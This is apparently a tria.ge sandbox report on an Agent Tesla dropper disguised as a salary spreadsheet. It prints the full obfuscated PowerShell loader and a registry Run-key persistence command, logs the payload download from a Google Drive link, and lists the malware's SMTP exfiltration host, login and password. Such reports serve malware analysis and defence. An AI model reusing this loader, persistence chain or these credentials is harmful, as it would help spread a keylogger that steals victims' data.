Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Salary List.xls.vbs

windows7-x64

10

Salary List.xls.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31/05/2024, 13:12 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Salary List.xls.vbs

  • Size

    1.1MB

  • MD5

    895c0c58f0e05a6b30b1b1956e76c16b

  • SHA1

    e56fc2959189ec7a520cbc17703ea3aa4550253c

  • SHA256

    4de05aee1a99ea577443c742aa6c1ce05e88c3c716c234f1d1598c2e648486da

  • SHA512

    51ee9a36c1f8b3a1c4dc17d8b823da8abcc78002fe4c81ae22010107f8f5536b7dde7217e662bc5feed85305629fc1b730e7cc25cd01ab83bf8c5b69c44faeb8

  • SSDEEP

    12288:j31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRj+:jYz64+2Sj+

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.myhydropowered.com
  • Port:
    587
  • Username:
    amazinggrace@myhydropowered.com
  • Password:
    JAyhAGxxVOdW6FW
  • Email To:
    power2prosper@myhydropowered.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Salary List.xls.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp ';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:908
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
        3⤵
          PID:1936
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Rekruttere='S';$Rekruttere+='ubs';$Rekruttere+='tri';$slanterne = 1;$Rekruttere+='ng';Function Auricyanhydric($Pandaric){$Microcytic=$Pandaric.Length-$slanterne;For( $Eurobarometer=7;$Eurobarometer -lt $Microcytic;$Eurobarometer+=8){$Semuncia+=$Pandaric.$Rekruttere.Invoke( $Eurobarometer, $slanterne);}$Semuncia;}function Forskerholdene($Countergambit){ . ($Accumber) ($Countergambit);}$Spartina=Auricyanhydric 'Ettals M Holo,hoW ooplaz CherimiLreproglCapricolPincustaDeliriu/Burnyko5 Chutzp.Micropa0Blephar pumpkin(Nonc nsWTrihal.iLappingnGensta d UdvikloNlnyhedw Horn.esAdenine RespektNGrafikmT.oshsca selvcen1Forsynd0Handels.Dvalent0Al,erta; Motetu K ingesWPectiniiApotheonTistyks6Grum ab4Tegnese;Genial. OmfavnexCeliosc6Bluster4Crispie;drjed.r Enkroner MorgenvGgeblom:E,ulger1Con,hom2 ,apper1Sphy ni.Forhjet0Filt.rp)Underta FremtoGTur,aboeEndotrocG.usgrak NotendoLittesa/Deq.een2Maniske0 To.vta1Suppler0 nordst0,ubjekt1Ekspone0Sindsop1Oranunp DetekteF Noncrii akkedrrUnder de EnkeltfLogiskeoKviltnixFrifind/Beskriv1Prefixi2 Stavri1Fremb,d.Ant,sep0Velform ';$Dilatableness=Auricyanhydric ',eltlngUTechnicsOpsigeledrivh sr ncleri- paulseA edeliggSnvledeeTjenestn DatabatAkademi ';$Isalena=Auricyanhydric 'BlusserhSkyggertViolonctUnretropAndelslsC,ttonw:Re rutt/ Dalbyd/ VejrsadVildtbirAn.enbeiFeltprsv Encradeschf.re.Magtensg Cyk,ltoSafterno ActivagBlowh,lledinb.re Superv.Demifusc Al,neao enialm Hastat/No,evocuSuperimcQuick e?Salatste moralxU garnfpMacrop oGastrotrTrmlksftRosolic=T.stubbd Phobiso CirkelwKonsis nAwmbriel AnorgaoMinerneaEn,gtendReducta& MelocoiSvin.ridSprogta=Skalspi1 AmourssVacil.aPRecapitJEvange,TVitialuE L.dsidOCly eniNUnprevev B.rgerCKonusidgTaboredXRacerenKasco.aruIncalveBN,ocubiqMisha toR gulatz LgehonoSydslesP,lyantsc HvervexUproot,WAffdtesxCameralhKulturpU.rswaywPReluctso LmlensKMuscled4EngembiUFormuliZSl vebok Optrk, ';$Modtagelsesdatoers=Auricyanhydric 'Ziriani>Indrapp ';$Accumber=Auricyanhydric ' Per eriSkrmbileLytteapx Stormn ';$Sankthansaftnen187='Amargosos';$Hofternes = Auricyanhydric '.natosaeRattingcOrdflomh.sarevnoAandsvr Fralgge%Spil.emaTabbillppizzabap Aandigdabbedisa Tv,ngstBundskja.haeosp%Medvide\ ToddyeU Fyrr md Unve.eeAnkringnKitchpobSchi lio Pebe mrHvervetdTuppe,isVolita mKlov.eroTitalsltProvinsoafsyrburVarsomh.SnablenVNon.isceSudanerj Forel, Antil,t&Udvi kn& Cel,do GrousineClifforcMenstruhillianno ,ndert Unmixdytpatr,ar ';Forskerholdene (Auricyanhydric 'Accordi$BaraitagVirensjltren ieoBe.rdedb .sotroaAntilialArdoise:AstrophHBaroucheGransknt,lyawayzBelyingeDisscepnUnbluesskogalsk=Krympes(Borgerrc.fretnimProduktd.uvaere Tykning/Rein.ercReading Tilkbet$Uner.tiHGlycoluoAlligatfFallitbtTransece varmemrCawst.rnliberaleIn bilds,upaiau)Lanknes ');Forskerholdene (Auricyanhydric 'Mourns,$SkrivergSpiritulAst,nykoAccelerbC.eeredaklaringlIngust :cephaloO.eskripr WoodmagMononucaDesmerenFon.anei Tilbygs rndseaS.atshatHestek iKaolinsoLusketbnWildishsD.gsmaafSolsortoBoloismrLukewarmsm ltereDissembrplasmopnS.ersbyeRemortgs Fdsels=viftenk$SelvantIZ.oplassBisp.gaaIndkomslSpl,nteeUnre lenNinetyfa Une.fa.Merud isProstrapBalzar l,onkeyhidakoitst monami(Turtosa$PhthaleMPjalteroPhotosedAlvildst,nfundiaUnshr bgDwtan.eepromisclFremtvusBaelteseJolleymsSwellerdErhvervaFlirtpotOppo tuoCykelhae ,edhngrListesksMirijan)Fe tose ');$Isalena=$Organisationsformernes[0];$begets= (Auricyanhydric 'Justerv$Tetra rgFjeldsbl SkrddeoSubul.fbTrianguaUniflaglDatagru:masseprSCylindrl Dinaspi SlagtegKn,ldgah Pegam,tNonprudeisln.insvietnamt,tikker=.ntifonNBalkavaeP.lotsywFr,itil- Skin.fO NedskrbMindretjPlatodeeFodboldcInternetpneuma, PencilS translyGen.dtesLasarwotDronerseUredinemBlo,ste.DokumenNIntercoeGastrittTribula.SpaantaWStikline Smk.edbBen dicCPostphtlT strukiRectif e Ca,tionUla lart');$begets+=$Hetzens[1];Forskerholdene ($begets);Forskerholdene (Auricyanhydric ' Ko.dpr$Und rseSIntabullMusco,iiowe mang IntoxihOmvisentNonabraeAfrustnsLighedstIndikat.Jol erhH Sulfide Stive,aGenfremd UndereeF,otwayrRedirigssisterl[B.mrkni$ haunchDAe.uianiHigdo,llAerometaBorgerhtBa.projaUnfernlbGnomonil InsinueZebrablnCon opteIn,estesCommunisForblff]Afstikk=Wrainst$CenterlSAbdic,tptopchefa HoggyarDrouthitUmbrineiZoospgin,quirinaRomeite ');$alkoholikeren=Auricyanhydric 'informa$SlyngboS ultislC,nterhiIllustrgReshinehbygget,t EskimoeSmilaxes,ovbefatDissymm.SabrephD DokumeoGttforswSaalskanSljdenslTepott,o Na velaRealle.d E.hoisF Gains,iFarmhoulDaarekieLan.zon(Hor,oni$AntndelIKreditgsA,kerneaKommandl Webbieeabsolven VindtraKrimina,Imbalme$SikkerhnAbhorsaiBrn,vrntDipleurtAzotisie DeerhonProsomadCommentePaskvild S rmsteUnr.joilCapitol)Chlamyd ';$nittendedel=$Hetzens[0];Forskerholdene (Auricyanhydric 'Sany ko$TankanggNonneorl ubpharoslg.sprbEfter,aaHemme,ilG stero:I dkoblP FlaatsoBasi,idp DittemuTornirilHypother.nrealit Fuldst=G.ptisk(arbithfTKmpehjjefratruksAntagont anstte-OophoroP .appyraTillidstJaunbakhVestenv Ammunit$Woodbinn ldgreri O,egratPet,ysttIngmarse TransanLegsstidUnc nceevitessedDemarkseSpellinl famili)Filtrat ');while (!$Populrt) {Forskerholdene (Auricyanhydric 'O sedeu$Sylvag.gSvinghjl BurhnsoAnlgsa,b,etragra FakturlU verid:Weir,neSUr,tfrdc InkleseIndv,innBetalinaVagtannrTissemaiUdradersSkydelokTe ebri=svededr$Chancr tDataopsrRygepauu forste moundw ') ;Forskerholdene $alkoholikeren;Forskerholdene (Auricyanhydric 'BiavlerSUnitr.st nutcera pc,reirskrivestnavaho.-DrooptpSSkarnbol Bund,peHasheeseTrykkedpModef,l palisad4 Reg af ');Forskerholdene (Auricyanhydric 'Fyrsteh$Prefi,ugNontolelShaled.oSkjtekobHyposthaPat.oullRegimen:KlimatoPEksorbioC,arbocpRet.stauTrio.erlPopelyprTattleft Deltal=b,astoc(WhoduniTstyringeBrugtvosAb,orbatHusaren-BykernePMilj ttaDepictitSlu edehKrok.se G.veren$Ema lvonOrth cei StigmatTrveskrtUnaddede AdmiranDannebrd synseveHae athdSjoveree ejlslul vagin)Bogsurn ') ;Forskerholdene (Auricyanhydric 'vo.nman$ ubeh,fgOvera dlFilamenoMyosin,b,udevoraAscri,tl Embiot:Avan,gak.eurololPersonsuFormicadBru.secr alecheeDominikd,dendrseAccelers Kronpr=Abjects$StinkskgNige,ialWheeplioPrdikedb El ctratap,ttalOprinde:ZoolithN Ka erssSvingkatForle.eb Parodoe Livsted Un kkesTrommestTilm.ld+Torech +Luxk oa% Tobakk$BrakestO traykirsondringAmagermaSortebrnConidiui StdpudsAmbula.a Hi,hhatNavigatiEndot,eoLookywanIspindesSkolerafEfterudoOptagetrInter rmSecreteePolyp,ar OpvasknMo alpreCo partsSynskre. overlacFdrela,oJuris euNo.dmarn Udsalgt veteri ') ;$Isalena=$Organisationsformernes[$kludredes];}$Entosphenal=336951;$Storrums=29963;Forskerholdene (Auricyanhydric 'Voltmet$shfalmegFancifulRo,antioFrostklbBochu haInsolvel Affyri:Taks.noFarbejdslAngelicy.lurrinnSa,mensdoffsetteFluefanrtriska. S,apsu=Centerv UnpaupeG dis cieBestrewtUnslyma-Keg,estCSeptocoo DigitinleannestLandskaeTab.erinC.ntraltviewpoi Filator$lagdelinBeadrowiStrmerbtRullematD.cryoceOverir nUnvi.iodEm,owereBrne ykd AsympteBudgetmlLe,copl ');Forskerholdene (Auricyanhydric 'Ligfald$ToldeglgKlassislChiti.ooLen itubUk,alifaVeggierlBrmmer,:Da,elsmMTransyldNarkosed KnoxviiNettiesn Udpi.tg Se,rnesSk iveb Acanth= Blood Shog.p[ monophSKongresy ForsvasOve.skytDj,elske preautmFumete.. KntrenCindkraeo Tse idn ejevrvOpsgnineHaylagerPupemottCh,nger]Forward:Ordkomb:UdbasunFamtspolrContermoT,rapeumMuffi,hBVordingaConn tisEneta.ee Anlgsb6 Afdeli4Unmoat.SRitterstFlymekarBlaguebi Andr,gnDemiha.gJant.rp(transve$CunjevoFH,permnlAanderfyKat lyzn Stru,td BogtryeOuttalkrUtilfre) Ditet ');Forskerholdene (Auricyanhydric 'Reverse$embryopgIntertrlStrblinoSaft,olbCarpoidaPhoronilbaraltv:T,kerneRDaw sderHa,cucalDramatigTelesiagDemobileFul,ends Verbif Stofpri= Skille A,onine[gnomonfSUdlud.iy Simults SaudiatGa,troceSpidstemTempest.Hir,ellTFeru.ebeRkeb,skxReli,blt,elefon.LavningEFrygisknLegemulc SpherioDebarbadEpic leiTredjepnAfklippgNonvi.u]Frightl: Asepto:brachyaAUdklassS,olioviC BornylIChaf suIBewired.DutcherGArbej.seSindstitCastlewSToptekstTajgaenrVand aniJul kaknRaced sgGulfwee(Gnathon$AnhydreM SomnoldBulensad KastreiEndothrnprisonlgFarsotes Outwhi)Vest.ns ');Forskerholdene (Auricyanhydric ' .agtso$YogasangFormildl Str,ndoDermostb Gya.una B.ntuelDra ber:IncumbeHSiretlea.emelytlglsningvStraffelNonfalleD.umaslgHelnodesparce,erLode,srealeins,sSi elinuLe ningl,rosscutObolbliaIsl mistOvergrasW,tjarn=Sivathe$AmassetRForulykrSam,undlTyr.nneg Ho tesg KlumreeNiftinesInorna..InfragesPrferenu rembrbHela,tosUdgan.stRustederBhlamdei MediusnoctosylgDe,ylen(Overfou$SenilkoE ObituanMisfornt L ndedoNetma.esEstaminpVikingehaphrodie dr,matnPizzaeraArticullHeterop,Befugte$BalanceS Semi.at P eudaoKlistrirHardhe,rOffloadumorphopmTilvkstsVa.dtrd)Fravri, ');Forskerholdene $Halvlegsresultats;"
          3⤵
            PID:2172
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Udenbordsmotor.Vej && echo t"
              4⤵
                PID:2724
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                • Adds Run key to start application
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2584
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2396
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Boligforeningers% -w 1 $Fllesbetegnelser=(Get-ItemProperty -Path 'HKCU:\Kneepads\').Oocystis;%Boligforeningers% ($Fllesbetegnelser)"
                    6⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:2532

        Network

        • flag-us
          DNS
          drive.google.com
          wab.exe
          Remote address:
          8.8.8.8:53
          Request
          drive.google.com
          IN A
          Response
          drive.google.com
          IN A
          142.250.187.238
        • flag-gb
          GET
          https://drive.google.com/uc?export=download&id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk
          powershell.exe
          Remote address:
          142.250.187.238:443
          Request
          GET /uc?export=download&id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: drive.google.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 303 See Other
          Content-Type: application/binary
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Fri, 31 May 2024 13:12:17 GMT
          Location: https://drive.usercontent.google.com/download?id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk&export=download
          Strict-Transport-Security: max-age=31536000
          Cross-Origin-Opener-Policy: same-origin
          Content-Security-Policy: script-src 'nonce-3HzHvLE1G30X36kfcrddEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          Server: ESF
          Content-Length: 0
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          DNS
          drive.usercontent.google.com
          wab.exe
          Remote address:
          8.8.8.8:53
          Request
          drive.usercontent.google.com
          IN A
          Response
          drive.usercontent.google.com
          IN A
          142.250.179.225
        • flag-gb
          GET
          https://drive.usercontent.google.com/download?id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk&export=download
          powershell.exe
          Remote address:
          142.250.179.225:443
          Request
          GET /download?id=1sPJTEONvCgXKuBqozoPcxWxhUPoK4UZk&export=download HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: drive.usercontent.google.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Content-Security-Policy: sandbox
          Content-Security-Policy: default-src 'none'
          Content-Security-Policy: frame-ancestors 'none'
          X-Content-Security-Policy: sandbox
          Cross-Origin-Opener-Policy: same-origin
          Cross-Origin-Embedder-Policy: require-corp
          Cross-Origin-Resource-Policy: same-site
          X-Content-Type-Options: nosniff
          Content-Disposition: attachment; filename="Eftergre.afm"
          Access-Control-Allow-Origin: *
          Access-Control-Allow-Credentials: false
